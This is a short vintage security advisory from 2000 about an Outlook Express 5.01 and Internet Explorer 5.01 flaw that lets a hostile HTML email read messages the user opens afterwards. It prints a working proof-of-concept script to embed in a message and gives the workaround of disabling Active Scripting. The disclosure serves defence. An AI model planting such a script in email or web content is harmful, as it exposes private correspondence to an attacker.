`Georgi Guninski security advisory #6, 2000
Outlook Express 5 vulnerability - Active Scripting may read email
messages
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of any company.
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Guninski is not liable for any damages caused by direct or indirect use
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Description:
Outlook Express 5.01 and Internet Explorer 5.01 under Windows 95
(suppose other versions are also vulnerable)
allow reading subsequently opened email messages after a hostile message
is opened.
Details:
The problem is assigning the document object of the email message to a
variable in a newly opened window.
Thru this variable access is possible to open email messages.
The code that must be included in HTML message is :
---------------------------------------------------------------------
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click
here to see the active message</A>");
a.x=window.document;
</SCRIPT>
---------------------------------------------------------------------
Workaround: Disable Active Scripting
Regards,
Georgi Guninski
http://www.nat.bg/~joro
`
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